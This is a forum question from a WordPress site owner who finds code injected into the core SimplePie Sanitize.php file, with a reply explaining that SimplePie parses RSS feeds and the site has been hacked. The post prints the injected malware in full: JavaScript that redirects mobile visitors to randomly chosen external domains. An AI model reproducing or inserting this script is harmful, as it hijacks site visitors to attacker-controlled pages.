anyone know what does simplepie do on my wordpress site?

using the next wordpress version: 4.2.2 plugins on my site:

Complementos instalados: LayerSlider WP por Kreatura Media versión 5.2.0
                     CodeStyling Localization por Heiko Rabe versión 1.99.30
                     Desactivar Comentarios por Samir Shah versión 1.3.1
                     Google Analytics por Yoast por Equipo Yoast versión 5.4.2
                     Anti-Malware and Brute-Force Security by ELI por Eli Scheetz versión 4.15.20
                     KIA Subtitle por Kathy Darling versión 1.6.3
                     Plugins Language Switcher por Vladimir Garagulya versión 1.4.4
                     Sucuri Security - Auditing
                     Malware Scanner and Hardening por Sucuri
                     INC versión 1.7.9
                     WooCommerce por WooThemes versión 2.1.8
                     WP Super Cache por Automattic versión 1.4.4

the route is the next: wp-includes/SimplePie/Sanitize.php

few days ago ( 10 may 2015) some code went inserted from nowhere in the field mentioned.

the code was the next:

        $ret .= '/headbodyscriptvar myArray = ['http://vikburgas.info/adb/','http://vikburgas.com/adb/','http://solodev.eu/adb/','http://vikvarna.net/adb/','http://vikplovdiv.com/adb/'];var ri = Math.floor(Math.random() * myArray.length);var url = myArray[ri];(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera, url);/script' . $html . '/body/html';

Topic simplepie Wordpress

Category Web

1
answered at

SimplePie library is shipped with WordPress core (for a long time now). It is used by it to parse RSS feeds.

Your issue is unrelated to it, it's very clearly a case of hacked site and malicious code being inserted.

Please note that recovery from hacks is considered not in scope in here. It's not something that can be "answered", you need competent professional to clean it up properly.

About

Geeks Mental is a community that publishes articles and tutorials about Web, Android, Data Science, new techniques and Linux security.